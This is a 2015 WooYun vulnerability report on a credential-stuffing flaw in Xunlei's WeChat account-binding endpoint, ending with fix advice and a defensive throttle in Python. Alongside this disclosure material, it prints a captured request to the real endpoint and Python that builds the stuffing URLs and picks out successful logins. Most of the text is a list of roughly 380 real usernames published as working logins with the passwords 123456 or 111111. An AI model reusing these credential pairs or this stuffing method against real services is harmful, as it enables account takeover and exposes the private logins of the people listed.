Vulnerability Summary

Bug ID: wooyun-2015-0142964

Title: A flaw in a Xunlei customer service system allows logging into large numbers of user accounts (hundreds within minutes)

Vendor: Xunlei

Author: Martial

Submitted: 2015-09-23 14:07

Fixed: 2015-11-07 15:02

Published: 2015-11-07 15:02

Vulnerability type: Design flaw / logic error

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability Details

Disclosure status:

2015-09-23: Details sent to the vendor, awaiting vendor handling
2015-09-23: Vendor confirmed; details disclosed to the vendor only
2015-10-03: Details disclosed to core white hats and domain experts
2015-10-13: Details disclosed to regular white hats
2015-10-23: Details disclosed to intern white hats
2015-11-07: Details disclosed to the public

Brief description:

The WeChat account-binding endpoint of Xunlei's customer service system accepts a Xunlei account name and password with no CAPTCHA, rate limit or lockout, so a credential-stuffing run logs into large numbers of user accounts (hundreds succeed within minutes).

Detailed description:

In WeChat, follow the official account "迅雷客户服务" (Xunlei Customer Service), then tap "Me" (我) and tap the account-binding link:
http://act.vip.xunlei.com/waplogin/login.html?url=http%3A%2F%2Fjifen.xunlei.com%2Fweixinservice%2Fexchanges%2F
Intercepting the traffic captures the following request:

GET /kfweixin/server.php?type=toBind&openId=orWeAjsn10Nin0w0vq7wPgbfbrrE&createTime=1442980310&sign=ce4abe537b8f2b1646ed6b4aadfea203&account=wangjianhua&password=123456&timestamp=1442980329252&callback=jsonp2 HTTP/1.1
Host: dyactive.vip.xunlei.com
Referer: http://act.vip.xunlei.com/kfweixin/?openId=orWeAjsn10Nin0w0vq7wPgbfbrrE&createTime=1442980310&sign=ce4abe537b8f2b1646ed6b4aadfea203
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: zh-cn
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143 MicroMessenger/6.2.4 NetType/WIFI Language/zh_CN


Set account to a wordlist of common Chinese usernames with the password fixed at 123456 and run a credential-stuffing test with Burp (the captured request is replayed unchanged, including openId, createTime and sign; only account and password vary per attempt). A reply of
jsonp2({"rtn":0,"msg":"\u7ed1\u5b9a\u6210\u529f\uff01"});
(rtn 0, msg decoding to "绑定成功！", i.e. "binding successful") means that account/password pair was accepted; nothing throttled or challenged the repeated attempts.

(screenshot: 1.jpg)
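As an added example (not part of the original report), here is the logic of that Burp test written out in Python: build the toBind URL from the captured request with only account and password varied, strip the JSONP wrapper from each reply and classify it by its rtn field. Everything runs offline: the success body is the one shown in the report, while the failure body, the candidate list and the response table standing in for the server are constructed for the demo.

```python
import json
import re
import urllib.parse

# Parameters copied from the captured request on this page. In the Burp run the
# openId/createTime/sign triple was replayed unchanged; only account/password varied.
BASE_URL = "http://dyactive.vip.xunlei.com/kfweixin/server.php"
FIXED_PARAMS = {
    "type": "toBind",
    "openId": "orWeAjsn10Nin0w0vq7wPgbfbrrE",
    "createTime": "1442980310",
    "sign": "ce4abe537b8f2b1646ed6b4aadfea203",
    "callback": "jsonp2",
}

# Success reply exactly as shown in the report; the failure reply is CONSTRUCTED
# (the report does not show one) and only needs rtn != 0 for this demo.
SUCCESS_BODY = r'jsonp2({"rtn":0,"msg":"\u7ed1\u5b9a\u6210\u529f\uff01"});'
FAILURE_BODY = r'jsonp2({"rtn":1,"msg":"constructed failure"});'

_JSONP_RE = re.compile(r"^\s*(\w+)\((.*)\);?\s*$", re.S)


def build_bind_url(account, password, timestamp_ms=1442980329252):
    """One toBind request URL for a credential pair, same shape as the capture."""
    params = dict(FIXED_PARAMS, account=account, password=password,
                  timestamp=str(timestamp_ms))
    return BASE_URL + "?" + urllib.parse.urlencode(params)


def parse_jsonp(body):
    """Strip the JSONP callback wrapper and decode the JSON payload."""
    m = _JSONP_RE.match(body)
    if not m:
        raise ValueError("not a JSONP body: %r" % body[:40])
    return m.group(1), json.loads(m.group(2))


def classify(body):
    """Return ("success"|"failure", decoded msg); rtn == 0 is the success signal."""
    _callback, obj = parse_jsonp(body)
    status = "success" if obj.get("rtn") == 0 else "failure"
    return status, obj.get("msg", "")


def stuff_offline(candidates, oracle):
    """Replay the candidate list against a response oracle (a dict standing in for
    the server) and return the accounts whose password was accepted."""
    hits = []
    for account, password in candidates:
        body = oracle.get((account, password), FAILURE_BODY)
        status, _msg = classify(body)
        if status == "success":
            hits.append(account)
    return hits


if __name__ == "__main__":
    # Constructed sample: two accounts share the weak password, one does not.
    oracle = {("wangjianhua", "123456"): SUCCESS_BODY,
              ("dulei", "123456"): SUCCESS_BODY,
              ("gaoyang", "111111"): SUCCESS_BODY}
    candidates = [(u, "123456") for u in ("wangjianhua", "dulei", "gaoyang", "nobody")]
    print(build_bind_url(*candidates[0]))
    print(classify(SUCCESS_BODY))
    print(stuff_offline(candidates, oracle))
```

The point of the classifier is that the server's answer is an unambiguous oracle: rtn is 0 only when the password matched, so an attacker needs no screenshot or UI check to harvest hits, and the same signal is what a defender should be counting per caller.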


Below are nearly 300 accounts, all with the password 123456 (reproduced as posted; some names appear more than once):

wangjianhua
wangjianping
dulei
wangxiaoyan
majie
zhangmei
lidandan
chenhaiyan
zhangdandan
yangna
zhangzhiwei
lile
zhangxiaohong
liuhongmei
lilingling
zhoujianjun
xujianhua
zhaojia
wangxiaoyan
zhangchunmei
zhangshengli
wangjianzhong
zhanglijun
zhangxiaohong
wangyajun
chenchun
malina
zhanglijun
wangwenhua
wangyingying
weina
fangchao
wangxiaoyan
zhangyulan
zhangxiaoxia
zhaokun
wangzhiping
zhangjianqiang
wangjianzhong
wangyuanyuan
lidongsheng
zhanglijun
wangyanling
wangxiulan
zhouqiong
zhaojianping
wangfeifei
dulei
yumin
wangxiangyang
zhouxue
sunlili
liufangfang
liangmin
wangan
xueyong
wuguoqiang
dulei
zhaoqun
mengchao
zhoumi
dutao
yumin
majie
xuegang
liujianzhong
lilinlin
zhangyongping
zhangnana
wangminghua
lihuanhuan
wangchunhong
zhangxiaobing
liliping
yedan
yangjunjie
chenhaixia
zhuxiaoyan
lijinfeng
yanglixin
lubo
zhangyingchun
wangfeifei
wangyanxia
zhangmiaomiao
zhangzhijie
chenguoliang
wangxiufang
wangronghua
yangwu
chenda
zhangxiuzhen
dujing
wangguifang
jinmin
chenweiguo
heyun
wangyongliang
zhangchunyu
chenminghua
lixiufang
wangdongming
luojia
hanhua
dulei
liuyanling
wangshuguang
zhaozhiwei
xujianhua
lubo
yaojia
liuguiying
hanzhiqiang
guoxiang
liuyadong
yangxiuying
wangchangjiang
zhangzhiwen
cuijun
huanghong
chenjinsong
maxiaoyan
zhangchuang
sunlingling
zhoulihua
chenyonghua
wangxiaoying
suqiang
wuzhenhua
wangxiaoning
wangxiaoying
zhangxiuling
lixiansheng
xuxiaoyan
zhangwenwen
wangwenzhong
dongna
linlong
zhaolihua
zhangmei
liguifang
yanmin
liuminghua
lujia
zhangweifeng
liuxiaofang
zhangbowen
zhanghailei
wangxinping
zhanghongxing
lishuangshuang
liujianzhong
renfang
caoling
wangzhirong
leigang
zhangmeiying
sunlili
xujunjie
yefang
caojianguo
wangchunlan
lubo
zhuhongxia
liweiming
wangjunying
zhangan
lilinlin
lujia
xieleilei
wangchunying
chendongdong
gaochen
huhong
wangweixing
lixuefei
liyongmei
huangxudong
huangxiaofeng
wangce
songhaiyan
chenyanping
shenjianping
zhuguoqing
chenzhiwen
xuxiaoyan
zhouxiaohong
zhangruifang
liguoying
chenyanhua
lishulin
huangshaohua
wangjianping
zhengjianping
hushanshan
zhuxiaoyan
zhangchunguang
zhangchunhui
wangleijun
chenyanhua
wangxiaoyan
yangjunfeng
chengdan
luojianhua
huanghong
zhangmingjie
zhangyongzhong
jiangjianjun
wangxiangyu
huanghailong
mahaijun
wangxinming
wangjinliang
zhaozhiguo
chenxiulan
huangjianzhong
wangsuzhen
linjianping
zhangsongtao
dingjianguo
chenzhonghua
hanzhigang
liucaiyun
zhouxiaohong
liushufang
wangyuanyuan
wangxingxing
majie
zhangxiaoxue
wangdongfang
zhangchunlan
tianyan
yangweiwei
liuxiaofang
guoliping
liwenxia
dongzhigang
yangmeiling
zhangzhenzhen
liulifang
yangwenjing
zhangjinhai
zhuxinhua
lijinsheng
yangaijun
liruihua
lixinming
guolingling
zhulinlin
chenguoxiang
chenzhonghua
tianyan
chenxiaoliang
wangfujun
wangyongqing
zhangxinjun
wangguosheng
liujianlin
liuxiaolan
lujia
lilifang


The same run was then repeated with the password 111111; around 100 succeeded:

gaoyang
xujin
zhangjianwei
liucheng
chenjianping
liuhaifeng
zhaochao
gaoyang
gaoyang
chenweidong
huangjianhua
zhouqing
xuna
lixudong
zhangchunhua
yuqiang
gaoyang
lixiaoling
wangyunlong
xujingjing
sunyun
lilihua
zhouqing
yanghu
zhangweiping
wangpan
lixiaoling
zhangge
fengxue
zhouhuan
liucheng
luofang
zhujunjie
wangpan
houlei
lishun
lixinmin
zhouqing
hanshuai
chenxuefeng
liuwenming
zhanghongliang
zhanghongliang
yuqiang
liyongliang
luying
fangyi
xuna
liyuqin
wangyongfeng
yangsheng
pengling
lishuying
gaojia
lishuguang
zhukun
zhouwenjie
zhangweiping
lixinjian
zhangguoming
zhaolinlin
lixingxing
luying
chengxu
fengping
liucheng
houlei
xujingjing
luhong
chenxiaowei
chenyuying
yanjie
jinfei
chenguomin
yanghaiying
zhangchunhua
jiyong
zhanghuiling
chenyongliang
wangshijun
zhengzhigang
maoyong
licuiping


What the WeChat side shows:

(screenshot: 1.jpg)

(screenshot: 2.jpg)

(screenshot: 3.jpg)


Proof of vulnerability:

The account and password accepted here are the user's Xunlei-wide credentials (the same pair works across Xunlei's services), so every hit from the stuffing run is a login to that user's Xunlei account, not just a WeChat binding.

(screenshot: 4.jpg)

Fix recommendation:

Add a CAPTCHA to the binding request. On its own a CAPTCHA is a weak control (it is solved by services and is useless if only checked client-side), so pair it with server-side throttling: count failed toBind attempts per openId and per source IP, demand the CAPTCHA after a few failures and lock the key for a period after more. The captured request also carries account and password in a GET query string; move the credentials into a POST body so they stay out of access logs and Referer headers.
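As an added example, not part of the report and not Xunlei's code, here is the server-side throttle that should sit in front of a binding endpoint like toBind: failures are counted per openId and per source IP in a sliding window, a CAPTCHA is demanded after a few failures and the key is locked after more. The thresholds, the key names and the constructed credential list are assumptions for the demo; the clock is injectable so the run is deterministic offline.

```python
import time
from collections import defaultdict, deque


class BindAttemptGuard:
    """Sliding-window failure throttle for a credential-binding endpoint.

    Keys identify the caller, e.g. ("openId", ...) and ("ip", ...). After
    captcha_after failures inside window_s the caller must solve a CAPTCHA;
    after lock_after failures the key is locked for lock_s seconds.
    Thresholds are illustrative assumptions, not values from the report.
    """

    def __init__(self, captcha_after=3, lock_after=10, window_s=600,
                 lock_s=1800, clock=time.monotonic):
        self.captcha_after = captcha_after
        self.lock_after = lock_after
        self.window_s = window_s
        self.lock_s = lock_s
        self.clock = clock                  # injectable for offline tests
        self.failures = defaultdict(deque)  # key -> timestamps of recent failures
        self.locked_until = {}              # key -> time the lock expires

    def _recent_failures(self, key, now):
        q = self.failures[key]
        while q and now - q[0] > self.window_s:
            q.popleft()
        return len(q)

    def state(self, key):
        """'allow', 'captcha' or 'locked' for this key right now."""
        now = self.clock()
        if self.locked_until.get(key, 0.0) > now:
            return "locked"
        n = self._recent_failures(key, now)
        return "captcha" if n >= self.captcha_after else "allow"

    def record_failure(self, key):
        now = self.clock()
        self.failures[key].append(now)
        if self._recent_failures(key, now) >= self.lock_after:
            self.locked_until[key] = now + self.lock_s
            self.failures[key].clear()

    # A success deliberately does NOT reset the counters: an attacker holding one
    # valid pair could otherwise interleave it to keep stuffing the rest.


def decide_bind(guard, open_id, src_ip, captcha_ok):
    """Gate one toBind attempt on both keys; the strictest state wins."""
    states = {guard.state(("openId", open_id)), guard.state(("ip", src_ip))}
    if "locked" in states:
        return "reject_locked"
    if "captcha" in states and not captcha_ok:
        return "reject_need_captcha"
    return "proceed"


def simulate_stuffing(guard, open_id, src_ip, attempts, captcha_ok=False):
    """Replay a constructed (account, password, is_valid) list through the guard
    and return how many attempts reached the real credential check."""
    reached = 0
    for _account, _password, valid in attempts:
        if decide_bind(guard, open_id, src_ip, captcha_ok) != "proceed":
            continue
        reached += 1
        if not valid:
            guard.record_failure(("openId", open_id))
            guard.record_failure(("ip", src_ip))
    return reached


if __name__ == "__main__":
    guard = BindAttemptGuard()
    # Constructed list: 300 guesses with password 123456, none of them valid here.
    attempts = [("user%d" % i, "123456", False) for i in range(300)]
    print(simulate_stuffing(guard, "orWeAjsn10Nin0w0vq7wPgbfbrrE", "203.0.113.5", attempts))
```

Keying on the openId as well as the IP matters here: the binding link is issued to one WeChat identity, so a single openId trying hundreds of different Xunlei accounts is itself the anomaly, whatever IP the requests arrive from.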

Copyright notice: when reposting, credit the source Martial@WooYun


Vulnerability Response

Vendor response:

Severity: High

Rank: 15

Confirmed: 2015-09-23 15:00

Vendor reply:

Thanks for the report~

Latest status:

None